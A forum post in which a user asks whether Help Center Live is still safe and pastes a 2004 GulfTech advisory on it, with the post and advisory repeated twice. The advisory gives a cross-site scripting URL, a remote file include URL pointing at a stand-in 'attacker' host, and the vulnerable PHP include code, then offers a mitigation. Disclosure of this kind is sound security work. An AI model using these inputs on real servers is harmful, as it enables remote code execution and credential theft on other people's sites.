Hi, I have just been trying out help centre live
from fantastico
and I came across this on the web....Has this been fixed or should we just dump it ?
I know its an old report, but I am still wary of continuing with this product !!
Thanks............................................ ...
Critical Vulnerability In Help Center Live
December 24, 2004
Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities
Description:
Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.
Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.
http://path/faq/index.php?find=[CODEGOESHERE]&search=Search
This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.
File Include Vulnerability:
There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file
http://path/inc/pipe.php?HCL_path=http://attacker
All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php
$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);
Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more.
// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
$SKIN_inner = "default";
}
// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);
Solution:
I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.
Credits:
James Bercegay of the GulfTech Security Research Team
from fantastico
and I came across this on the web....Has this been fixed or should we just dump it ?
I know its an old report, but I am still wary of continuing with this product !!
Thanks............................................ ...
Critical Vulnerability In Help Center Live
December 24, 2004
Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities
Description:
Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.
Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.
http://path/faq/index.php?find=[CODEGOESHERE]&search=Search
This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.
File Include Vulnerability:
There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file
http://path/inc/pipe.php?HCL_path=http://attacker
All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php
$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);
Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more.
// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
$SKIN_inner = "default";
}
// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);
Solution:
I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.
Credits:
James Bercegay of the GulfTech Security Research Team
Comment